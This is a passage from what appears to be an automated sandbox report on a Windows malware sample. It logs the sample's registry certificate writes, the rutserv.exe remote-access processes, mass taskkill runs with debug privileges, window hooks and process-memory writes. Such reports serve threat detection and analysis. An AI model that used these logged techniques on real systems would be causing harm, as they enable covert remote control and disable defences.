0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 rutserv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 rutserv.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3416 PING.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe -
Suspicious use of AdjustPrivilegeToken 106 IoCs
description pid Process Token: SeDebugPrivilege 1716 taskkill.exe Token: SeDebugPrivilege 1020 rutserv.exe Token: SeTcbPrivilege 2840 svchost.exe Token: SeTcbPrivilege 2840 svchost.exe Token: SeDebugPrivilege 2776 taskkill.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 4060 taskkill.exe Token: SeTakeOwnershipPrivilege 2032 rutserv.exe Token: SeTcbPrivilege 2032 rutserv.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 3524 taskkill.exe Token: SeDebugPrivilege 1516 taskkill.exe Token: SeDebugPrivilege 3884 taskkill.exe Token: SeDebugPrivilege 3924 taskkill.exe Token: SeDebugPrivilege 2596 taskkill.exe Token: SeDebugPrivilege 1164 taskkill.exe Token: SeDebugPrivilege 3752 taskkill.exe Token: SeDebugPrivilege 2360 taskkill.exe Token: SeDebugPrivilege 2264 taskkill.exe Token: SeTcbPrivilege 2032 rutserv.exe Token: SeDebugPrivilege 3956 taskkill.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeDebugPrivilege 3952 taskkill.exe Token: SeDebugPrivilege 512 taskkill.exe Token: SeDebugPrivilege 2228 taskkill.exe Token: SeDebugPrivilege 3848 taskkill.exe Token: SeDebugPrivilege 4016 taskkill.exe Token: SeDebugPrivilege 1880 taskkill.exe Token: SeDebugPrivilege 3784 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 2676 taskkill.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 2180 taskkill.exe Token: SeDebugPrivilege 2604 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 4088 taskkill.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 2644 taskkill.exe Token: SeDebugPrivilege 2296 taskkill.exe Token: SeDebugPrivilege 3316 taskkill.exe Token: SeDebugPrivilege 3892 taskkill.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeDebugPrivilege 3820 taskkill.exe Token: SeDebugPrivilege 3988 taskkill.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 3276 taskkill.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 2140 taskkill.exe Token: SeDebugPrivilege 3396 taskkill.exe Token: SeDebugPrivilege 3548 taskkill.exe Token: SeDebugPrivilege 2740 taskkill.exe Token: SeDebugPrivilege 1592 taskkill.exe Token: SeDebugPrivilege 3376 taskkill.exe Token: SeDebugPrivilege 3968 taskkill.exe Token: SeDebugPrivilege 1252 taskkill.exe Token: SeDebugPrivilege 2772 taskkill.exe Token: SeDebugPrivilege 2924 taskkill.exe Token: SeDebugPrivilege 3192 taskkill.exe Token: SeDebugPrivilege 3256 taskkill.exe Token: SeDebugPrivilege 1220 taskkill.exe Token: SeDebugPrivilege 4024 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 1112 taskkill.exe Token: SeDebugPrivilege 3720 taskkill.exe Token: SeDebugPrivilege 4104 taskkill.exe Token: SeDebugPrivilege 4136 taskkill.exe Token: SeDebugPrivilege 4168 taskkill.exe Token: SeDebugPrivilege 4200 taskkill.exe Token: SeDebugPrivilege 4236 taskkill.exe Token: SeDebugPrivilege 4272 taskkill.exe Token: SeDebugPrivilege 4304 taskkill.exe Token: SeDebugPrivilege 4336 taskkill.exe Token: SeDebugPrivilege 4368 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe Token: SeDebugPrivilege 4444 taskkill.exe Token: SeDebugPrivilege 4492 taskkill.exe Token: SeDebugPrivilege 4568 taskkill.exe Token: SeDebugPrivilege 4604 taskkill.exe Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 4668 taskkill.exe Token: SeDebugPrivilege 4704 taskkill.exe Token: SeDebugPrivilege 4748 taskkill.exe Token: SeDebugPrivilege 4788 taskkill.exe Token: SeDebugPrivilege 4844 taskkill.exe Token: SeDebugPrivilege 4876 taskkill.exe Token: SeDebugPrivilege 4908 taskkill.exe Token: SeDebugPrivilege 4940 taskkill.exe Token: SeDebugPrivilege 4972 taskkill.exe Token: SeDebugPrivilege 5004 taskkill.exe Token: SeDebugPrivilege 5036 taskkill.exe Token: SeDebugPrivilege 5068 taskkill.exe Token: SeDebugPrivilege 5104 taskkill.exe Token: SeDebugPrivilege 2184 taskkill.exe Token: SeDebugPrivilege 4116 taskkill.exe Token: SeDebugPrivilege 4176 taskkill.exe Token: SeDebugPrivilege 4232 taskkill.exe Token: SeDebugPrivilege 4264 taskkill.exe Token: SeDebugPrivilege 4288 taskkill.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 4356 taskkill.exe Token: SeDebugPrivilege 4372 taskkill.exe Token: SeDebugPrivilege 4452 taskkill.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeDebugPrivilege 4600 taskkill.exe Token: SeDebugPrivilege 4628 taskkill.exe Token: SeDebugPrivilege 4652 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 1020 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe 2032 rutserv.exe -
Suspicious use of WriteProcessMemory 333 IoCs
description pid Process procid_target PID 3984 wrote to memory of 1780 3984 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe 74 PID 3984 wrote to memory of 1780 3984 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe 74 PID 3984 wrote to memory of 1780 3984 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe 74 PID 1780 wrote to memory of 2132 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 76 PID 1780 wrote to memory of 2132 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 76 PID 1780 wrote to memory of 2132 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 76 PID 2132 wrote to memory of 3416 2132 cmd.exe 78 PID 2132 wrote to memory of 3416 2132 cmd.exe 78 PID 2132 wrote to memory of 3416 2132 cmd.exe 78 PID 2132 wrote to memory of 3144 2132 cmd.exe 79 PID 2132 wrote to memory of 3144 2132 cmd.exe 79 PID 2132 wrote to memory of 3144 2132 cmd.exe 79 PID 1780 wrote to memory of 204 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 80 PID 1780 wrote to memory of 204 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 80 PID 1780 wrote to memory of 204 1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp 80 PID 204 wrote to memory of 3564 204 cmd.exe 82 PID 204 wrote to memory of 3564 204 cmd.exe 82 PID 204 wrote to memory of 3564 204 cmd.exe 82 PID 204 wrote to memory of 1812 204 cmd.exe 83 PID 204 wrote to memory of 1812 204 cmd.exe 83 PID 204 wrote to memory of 1812 204 cmd.exe 83 PID 204 wrote to memory of 1020 204 cmd.exe 86 PID 204 wrote to memory of 1020 204 cmd.exe 86 PID 204 wrote to memory of 1020 204 cmd.exe 86 PID 204 wrote to memory of 1716 204 cmd.exe 87 PID 204 wrote to memory of 1716 204 cmd.exe 87 PID 204 wrote to memory of 1716 204 cmd.exe 87 PID 204 wrote to memory of 2776 204 cmd.exe 89 PID 204 wrote to memory of 2776 204 cmd.exe 89 PID 204 wrote to memory of 2776 204 cmd.exe 89 PID 2840 wrote to memory of 2032 2840 svchost.exe 91 PID 2840 wrote to memory of 2032 2840 svchost.exe 91 PID 2840 wrote to memory of 2032 2840 svchost.exe 91 PID 204 wrote to memory of 2112 204 cmd.exe 92 PID 204 wrote to memory of 2112 204 cmd.exe 92 PID 204 wrote to memory of 2112 204 cmd.exe 92 PID 204 wrote to memory of 4060 204 cmd.exe 93 PID 204 wrote to memory of 4060 204 cmd.exe 93 PID 204 wrote to memory of 4060 204 cmd.exe 93 PID 204 wrote to memory of 2576 204 cmd.exe 94 PID 204 wrote to memory of 2576 204 cmd.exe 94 PID 204 wrote to memory of 2576 204 cmd.exe 94 PID 204 wrote to memory of 3524 204 cmd.exe 95 PID 204 wrote to memory of 3524 204 cmd.exe 95 PID 204 wrote to memory of 3524 204 cmd.exe 95 PID 204 wrote to memory of 1516 204 cmd.exe 96 PID 204 wrote to memory of 1516 204 cmd.exe 96 PID 204 wrote to memory of 1516 204 cmd.exe 96 PID 204 wrote to memory of 3884 204 cmd.exe 97 PID 204 wrote to memory of 3884 204 cmd.exe 97 PID 204 wrote to memory of 3884 204 cmd.exe 97 PID 204 wrote to memory of 3924 204 cmd.exe 98 PID 204 wrote to memory of 3924 204 cmd.exe 98 PID 204 wrote to memory of 3924 204 cmd.exe 98 PID 204 wrote to memory of 2596 204 cmd.exe 99 PID 204 wrote to memory of 2596 204 cmd.exe 99 PID 204 wrote to memory of 2596 204 cmd.exe 99 PID 204 wrote to memory of 1164 204 cmd.exe 100 PID 204 wrote to memory of 1164 204 cmd.exe 100 PID 204 wrote to memory of 1164 204 cmd.exe 100 PID 204 wrote to memory of 3752 204 cmd.exe 101 PID 204 wrote to memory of 3752 204 cmd.exe 101 PID 204 wrote to memory of 3752 204 cmd.exe 101 PID 204 wrote to memory of 2360 204 cmd.exe 102 PID 204 wrote to memory of 2360 204 cmd.exe 102 PID 204 wrote to memory of 2360 204 cmd.exe 102 PID 204 wrote to memory of 2264 204 cmd.exe 103 PID 204 wrote to memory of 2264 204 cmd.exe 103 PID 204 wrote to memory of 2264 204 cmd.exe 103 PID 204 wrote to memory of 3956 204 cmd.exe 104 PID 204 wrote to memory of 3956 204 cmd.exe 104 PID 204 wrote to memory of 3956 204 cmd.exe 104 PID 204 wrote to memory of 2224 204 cmd.exe 105 PID 204 wrote to memory of 2224 204 cmd.exe 105 PID 204 wrote to memory of 2224 204 cmd.exe 105 PID 204 wrote to memory of 3952 204 cmd.exe 106 PID 204 wrote to memory of 3952 204 cmd.exe 106 PID 204 wrote to memory of 3952 204 cmd.exe 106 PID 204 wrote to memory of 512 204 cmd.exe 107 PID 204 wrote to memory of 512 204 cmd.exe 107 PID 204 wrote to memory of 512 204 cmd.exe 107 PID 204 wrote to memory of 2228 204 cmd.exe 108 PID 204 wrote to memory of 2228 204 cmd.exe 108 PID 204 wrote to memory of 2228 204 cmd.exe 108 PID 204 wrote to memory of 3848 204 cmd.exe 110 PID 204 wrote to memory of 3848 204 cmd.exe 110 PID 204 wrote to memory of 3848 204 cmd.exe 110 PID 204 wrote to memory of 4016 204 cmd.exe 111 PID 204 wrote to memory of 4016 204 cmd.exe 111 PID 204 wrote to memory of 4016 204 cmd.exe 111 PID 204 wrote to memory of 1880 204 cmd.exe 112 PID 204 wrote to memory of 1880 204 cmd.exe 112 PID 204 wrote to memory of 1880 204 cmd.exe 112 PID 204 wrote to memory of 3784 204 cmd.exe 113 PID 204 wrote to memory of 3784 204 cmd.exe 113 PID 204 wrote to memory of 3784 204 cmd.exe 113 PID 204 wrote to memory of 1532 204 cmd.exe 114 PID 204 wrote to memory of 1532 204 cmd.exe 114 PID 204 wrote to memory of 1532 204 cmd.exe 114 PID 204 wrote to memory of 2676 204 cmd.exe 115 PID 204 wrote to memory of 2676 204 cmd.exe 115 PID 204 wrote to memory of 2676 204 cmd.exe 115 PID 204 wrote to memory of 3052 204 cmd.exe 116 PID 204 wrote to memory of 3052 204 cmd.exe 116 PID 204 wrote to memory of 3052 204 cmd.exe 116 PID 204 wrote to memory of 2180 204 cmd.exe 117 PID 204 wrote to memory of 2180 204 cmd.exe 117 PID 204 wrote to memory of 2180 204 cmd.exe 117 PID 204 wrote to memory of 2604 204 cmd.exe 118 PID 204 wrote to memory of 2604 204 cmd.exe 118 PID 204 wrote to memory of 2604 204 cmd.exe 118 PID 204 wrote to memory of 1672 204 cmd.exe 119 PID 204 wrote to memory of 1672 204 cmd.exe 119 PID 204 wrote to memory of 1672 204 cmd.exe 119 PID 204 wrote to memory of 4088 204 cmd.exe 120 PID 204 wrote to memory of 4088 204 cmd.exe 120 PID 204 wrote to memory of 4088 204 cmd.exe 120 PID 204 wrote to memory of 2196 204 cmd.exe 121 PID 204 wrote to memory of 2196 204 cmd.exe 121 PID 204 wrote to memory of 2196 204 cmd.exe 121 PID 204 wrote to memory of 2644 204 cmd.exe 122 PID 204 wrote to memory of 2644 204 cmd.exe 122 PID 204 wrote to memory of 2644 204 cmd.exe 122 PID 204 wrote to memory of 2296 204 cmd.exe 123 PID 204 wrote to memory of 2296 204 cmd.exe 123 PID 204 wrote to memory of 2296 204 cmd.exe 123 PID 204 wrote to memory of 3316 204 cmd.exe 124 PID 204 wrote to memory of 3316 204 cmd.exe 124 PID 204 wrote to memory of 3316 204 cmd.exe 124 PID 204 wrote to memory of 3892 204 cmd.exe 125 PID 204 wrote to memory of 3892 204 cmd.exe 125 PID 204 wrote to memory of 3892 204 cmd.exe 125 PID 204 wrote to memory of 2052 204 cmd.exe 126 PID 204 wrote to memory of 2052 204 cmd.exe 126 PID 204 wrote to memory of 2052 204 cmd.exe 126 PID 204 wrote to memory of 3820 204 cmd.exe 127 PID 204 wrote to memory of 3820 204 cmd.exe 127 PID 204 wrote to memory of 3820 204 cmd.exe 127 PID 204 wrote to memory of 3988 204 cmd.exe 128 PID 204 wrote to memory of 3988 204 cmd.exe 128 PID 204 wrote to memory of 3988 204 cmd.exe 128 PID 204 wrote to memory of 2760 204 cmd.exe 129 PID 204 wrote to memory of 2760 204 cmd.exe 129 PID 204 wrote to memory of 2760 204 cmd.exe 129 PID 204 wrote to memory of 3276 204 cmd.exe 130 PID 204 wrote to memory of 3276 204 cmd.exe 130 PID 204 wrote to memory of 3276 204 cmd.exe 130 PID 204 wrote to memory of 1460 204 cmd.exe 131 PID 204 wrote to memory of 1460 204 cmd.exe 131 PID 204 wrote to memory of 1460 204 cmd.exe 131 PID 204 wrote to memory of 2140 204 cmd.exe 132 PID 204 wrote to memory of 2140 204 cmd.exe 132 PID 204 wrote to memory of 2140 204 cmd.exe 132 PID 204 wrote to memory of 3396 204 cmd.exe 133 PID 204 wrote to memory of 3396 204 cmd.exe 133 PID 204 wrote to memory of 3396 204 cmd.exe 133 PID 204 wrote to memory of 3548 204 cmd.exe 134 PID 204 wrote to memory of 3548 204 cmd.exe 134 PID 204 wrote to memory of 3548 204 cmd.exe 134 PID 204 wrote to memory of 2740 204 cmd.exe 135 PID 204 wrote to memory of 2740 204 cmd.exe 135 PID 204 wrote to memory of 2740 204 cmd.exe 135 PID 204 wrote to memory of 1592 204 cmd.exe 136 PID 204 wrote to memory of 1592 204 cmd.exe 136 PID 204 wrote to memory of 1592 204 cmd.exe 136 PID 204 wrote to memory of 3376 204 cmd.exe 137 PID 204 wrote to memory of 3376 204 cmd.exe 137 PID 204 wrote to memory of 3376 204 cmd.exe 137 PID 204 wrote to memory of 3968 204 cmd.exe 138 PID 204 wrote to memory of 3968 204 cmd.exe 138 PID 204 wrote to memory of 3968 204 cmd.exe 138 PID 204 wrote to memory of 1252 204 cmd.exe 139 PID 204 wrote to memory of 1252 204 cmd.exe 139 PID 204 wrote to memory of 1252 204 cmd.exe 139 PID 204 wrote to memory of 2772 204 cmd.exe 140 PID 204 wrote to memory of 2772 204 cmd.exe 140 PID 204 wrote to memory of 2772 204 cmd.exe 140 PID 204 wrote to memory of 2924 204 cmd.exe 141 PID 204 wrote to memory of 2924 204 cmd.exe 141 PID 204 wrote to memory of 2924 204 cmd.exe 141 PID 204 wrote to memory of 3192 204 cmd.exe 142 PID 204 wrote to memory of 3192 204 cmd.exe 142 PID 204 wrote to memory of 3192 204 cmd.exe 142 PID 204 wrote to memory of 3256 204 cmd.exe 143 PID 204 wrote to memory of 3256 204 cmd.exe 143 PID 204 wrote to memory of 3256 204 cmd.exe 143 PID 204 wrote to memory of 1220 204 cmd.exe 144 PID 204 wrote to memory of 1220 204 cmd.exe 144 PID 204 wrote to memory of 1220 204 cmd.exe 144 PID 204 wrote to memory of 4024 204 cmd.exe 145 PID 204 wrote to memory of 4024 204 cmd.exe 145 PID 204 wrote to memory of 4024 204 cmd.exe 145 PID 204 wrote to memory of 1564 204 cmd.exe 146 PID 204 wrote to memory of 1564 204 cmd.exe 146 PID 204 wrote to memory of 1564 204 cmd.exe 146 PID 204 wrote to memory of 1112 204 cmd.exe 147 PID 204 wrote to memory of 1112 204 cmd.exe 147 PID 204 wrote to memory of 1112 204 cmd.exe 147 PID 204 wrote to memory of 3720 204 cmd.exe 148 PID 204 wrote to memory of 3720 204 cmd.exe 148 PID 204 wrote to memory of 3720 204 cmd.exe 148 PID 204 wrote to memory of 4104 204 cmd.exe 149 PID 204 wrote to memory of 4104 204 cmd.exe 149 PID 204 wrote to memory of 4104 204 cmd.exe 149 PID 204 wrote to memory of 4136 204 cmd.exe 150 PID 204 wrote to memory of 4136 204 cmd.exe 150 PID 204 wrote to memory of 4136 204 cmd.exe 150 PID 204 wrote to memory of 4168 204 cmd.exe 151 PID 204 wrote to memory of 4168 204 cmd.exe 151 PID 204 wrote to memory of 4168 204 cmd.exe 151 PID 204 wrote to memory of 4200 204 cmd.exe 152 PID 204 wrote to memory of 4200 204 cmd.exe 152 PID 204 wrote to memory of 4200 204 cmd.exe 152 PID 204 wrote to memory of 4236 204 cmd.exe 153 PID 204 wrote to memory of 4236 204 cmd.exe 153 PID 204 wrote to memory of 4236 204 cmd.exe 153 PID 204 wrote to memory of 4272 204 cmd.exe 154 PID 204 wrote to memory of 4272 204 cmd.exe 154 PID 204 wrote to memory of 4272 204 cmd.exe 154 PID 204 wrote to memory of 4304 204 cmd.exe 155 PID 204 wrote to memory of 4304 204 cmd.exe 155 PID 204 wrote to memory of 4304 204 cmd.exe 155 PID 204 wrote to memory of 4336 204 cmd.exe 156 PID 204 wrote to memory of 4336 204 cmd.exe 156 PID 204 wrote to memory of 4336 204 cmd.exe 156 PID 204 wrote to memory of 4368 204 cmd.exe 157 PID 204 wrote to memory of 4368 204 cmd.exe 157 PID 204 wrote to memory of 4368 204 cmd.exe 157 PID 204 wrote to memory of 4408 204 cmd.exe 158 PID 204 wrote to memory of 4408 204 cmd.exe 158 PID 204 wrote to memory of 4408 204 cmd.exe 158 PID 204 wrote to memory of 4444 204 cmd.exe 159 PID 204 wrote to memory of 4444 204 cmd.exe 159 PID 204 wrote to memory of 4444 204 cmd.exe 159 PID 204 wrote to memory of 4492 204 cmd.exe 160 PID 204 wrote to memory of 4492 204 cmd.exe 160 PID 204 wrote to memory of 4492 204 cmd.exe 160 PID 204 wrote to memory of 4568 204 cmd.exe 162 PID 204 wrote to memory of 4568 204 cmd.exe 162 PID 204 wrote to memory of 4568 204 cmd.exe 162 PID 204 wrote to memory of 4604 204 cmd.exe 163 PID 204 wrote to memory of 4604 204 cmd.exe 163 PID 204 wrote to memory of 4604 204 cmd.exe 163 PID 204 wrote to memory of 4636 204 cmd.exe 164 PID 204 wrote to memory of 4636 204 cmd.exe 164 PID 204 wrote to memory of 4636 204 cmd.exe 164 PID 204 wrote to memory of 4668 204 cmd.exe 165 PID 204 wrote to memory of 4668 204 cmd.exe 165 PID 204 wrote to memory of 4668 204 cmd.exe 165 PID 204 wrote to memory of 4704 204 cmd.exe 166 PID 204 wrote to memory of 4704 204 cmd.exe 166 PID 204 wrote to memory of 4704 204 cmd.exe 166 PID 204 wrote to memory of 4748 204 cmd.exe 167 PID 204 wrote to memory of 4748 204 cmd.exe 167 PID 204 wrote to memory of 4748 204 cmd.exe 167 PID 204 wrote to memory of 4788 204 cmd.exe 168 PID 204 wrote to memory of 4788 204 cmd.exe 168 PID 204 wrote to memory of 4788 204 cmd.exe 168 PID 204 wrote to memory of 4844 204 cmd.exe 169 PID 204 wrote to memory of 4844 204 cmd.exe 169 PID 204 wrote to memory of 4844 204 cmd.exe 169 PID 204 wrote to memory of 4876 204 cmd.exe 170 PID 204 wrote to memory of 4876 204 cmd.exe 170 PID 204 wrote to memory of 4876 204 cmd.exe 170 PID 204 wrote to memory of 4908 204 cmd.exe 171 PID 204 wrote to memory of 4908 204 cmd.exe 171 PID 204 wrote to memory of 4908 204 cmd.exe 171 PID 204 wrote to memory of 4940 204 cmd.exe 172 PID 204 wrote to memory of 4940 204 cmd.exe 172 PID 204 wrote to memory of 4940 204 cmd.exe 172 PID 204 wrote to memory of 4972 204 cmd.exe 173 PID 204 wrote to memory of 4972 204 cmd.exe 173 PID 204 wrote to memory of 4972 204 cmd.exe 173 PID 204 wrote to memory of 5004 204 cmd.exe 174 PID 204 wrote to memory of 5004 204 cmd.exe 174 PID 204 wrote to memory of 5004 204 cmd.exe 174 PID 204 wrote to memory of 5036 204 cmd.exe 175 PID 204 wrote to memory of 5036 204 cmd.exe 175 PID 204 wrote to memory of 5036 204 cmd.exe 175 PID 204 wrote to memory of 5068 204 cmd.exe 176 PID 204 wrote to memory of 5068 204 cmd.exe 176 PID 204 wrote to memory of 5068 204 cmd.exe 176 PID 204 wrote to memory of 5104 204 cmd.exe 177 PID 204 wrote to memory of 5104 204 cmd.exe 177 PID 204 wrote to memory of 5104 204 cmd.exe 177 PID 204 wrote to memory of 2184 204 cmd.exe 178 PID 204 wrote to memory of 2184 204 cmd.exe 178 PID 204 wrote to memory of 2184 204 cmd.exe 178 PID 204 wrote to memory of 4116 204 cmd.exe 179 PID 204 wrote to memory of 4116 204 cmd.exe 179 PID 204 wrote to memory of 4116 204 cmd.exe 179 PID 204 wrote to memory of 4176 204 cmd.exe 180 PID 204 wrote to memory of 4176 204 cmd.exe 180 PID 204 wrote to memory of 4176 204 cmd.exe 180 PID 204 wrote to memory of 4232 204 cmd.exe 181 PID 204 wrote to memory of 4232 204 cmd.exe 181 PID 204 wrote to memory of 4232 204 cmd.exe 181 PID 204 wrote to memory of 4264 204 cmd.exe 182 PID 204 wrote to memory of 4264 204 cmd.exe 182 PID 204 wrote to memory of 4264 204 cmd.exe 182 PID 204 wrote to memory of 4288 204 cmd.exe 183 PID 204 wrote to memory of 4288 204 cmd.exe 183 PID 204 wrote to memory of 4288 204 cmd.exe 183 PID 204 wrote to memory of 4308 204 cmd.exe 184 PID 204 wrote to memory of 4308 204 cmd.exe 184 PID 204 wrote to memory of 4308 204 cmd.exe 184 PID 204 wrote to memory of 4356 204 cmd.exe 185 PID 204 wrote to memory of 4356 204 cmd.exe 185 PID 204 wrote to memory of 4356 204 cmd.exe 185 PID 204 wrote to memory of 4372 204 cmd.exe 186 PID 204 wrote to memory of 4372 204 cmd.exe 186 PID 204 wrote to memory of 4372 204 cmd.exe 186 PID 204 wrote to memory of 4452 204 cmd.exe 187 PID 204 wrote to memory of 4452 204 cmd.exe 187 PID 204 wrote to memory of 4452 204 cmd.exe 187 PID 204 wrote to memory of 4560 204 cmd.exe 188 PID 204 wrote to memory of 4560 204 cmd.exe 188 PID 204 wrote to memory of 4560 204 cmd.exe 188 PID 204 wrote to memory of 4600 204 cmd.exe 189 PID 204 wrote to memory of 4600 204 cmd.exe 189 PID 204 wrote to memory of 4600 204 cmd.exe 189 PID 204 wrote to memory of 4628 204 cmd.exe 190 PID 204 wrote to memory of 4628 204 cmd.exe 190 PID 204 wrote to memory of 4628 204 cmd.exe 190 PID 204 wrote to memory of 4652 204 cmd.exe 191 PID 204 wrote to memory of 4652 204 cmd.exe 191 PID 204 wrote to memory of 4652 204 cmd.exe 191 PID 204 wrote to memory of 4672 204 cmd.exe 192 PID 204 wrote to memory of 4672 204 cmd.exe 192 PID 204 wrote to memory of 4672 204 cmd.exe 192 PID 204 wrote to memory of 4720 204 cmd.exe 193 PID 204 wrote to memory of 4720 204 cmd.exe 193 PID 204 wrote to memory of 4720 204 cmd.exe 193
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
